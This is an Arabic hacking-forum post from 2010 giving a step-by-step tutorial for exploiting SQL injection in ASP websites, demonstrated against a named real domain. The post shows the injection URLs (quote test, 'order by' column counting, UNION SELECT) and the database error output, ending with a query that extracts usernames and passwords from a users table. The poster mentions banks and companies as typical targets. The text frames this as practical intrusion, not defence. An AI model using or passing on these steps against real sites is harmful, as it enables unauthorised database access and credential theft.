التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-08-2010, 09:29 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي شرح مبسط : استغلال ثغرات Asp باحتراف ..


السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
www.haybersqlogretiyo.com/baskabibolum.asp?id=10"


يظهر لنا الخطأ التالى :

كود PHP:
 Microsoft JET Database Engine error ’80040e14’  
Syntax error in string in query expression ’id 
10";’.  
/baskabirbolum.asp, line 7 
لان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10
http://www.haybersqlogretiyo.com/bas...10+order+by+10
يظهر الخطأ التالى :

كود PHP:
 Microsoft JET Database Engine error ’80040e14’  
The Microsoft Jet database engine does not recognize ’10’ 
as a valid field name or expression.  
/
news.aspline 7 
ويكون العمود المصاب الرقم 8
http://www.haybersqlogretiyo.com/bas...=10+order+by+8



http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة

كود PHP:
   Microsoft JET Database Engine error ’80040e37’  
The Microsoft Jet database engine cannot find the input table 
or query ’hayber’Make sure it exists and that its name is spelled correctly.  
/
baskabirbolum.aspline 7 
واسمها : hayber

ويتم استغلالها .

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6
, 7+from+hayber

والان نظهر اسم اليوزر والباس

http://www.haybersqlogretiyo.com/bas...0,username,pas
sword,3,4,5,6,7+from+users



تحياتي

اقتباس

منقول عن قراصنه نابلس
Mr.X




avp lfs' : hsjyghg eyvhj Asp fhpjvht >>

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
][الدرس الثالث استغلال ثغرات المتصفح][ DR.THMoORY قســم إختــراق الأجهــزة 255 10-27-2011 01:33 AM
استغلال ثغرات الـ c o o k i es Handling Vulnerability Red-D3v1L قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 02-01-2011 08:46 AM
كيف يمكن استغلال ثغرات man.sh meta.pl bb-hist.sh killer-32 جـــ'ابات العناكــ'ب 12 12-03-2009 11:02 PM
كيف يمكن استغلال ثغرات man.sh meta.pl bb-hist.sh killer-32 جـــ'ابات العناكــ'ب 2 12-01-2009 03:56 PM


الساعة الآن 11:46 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0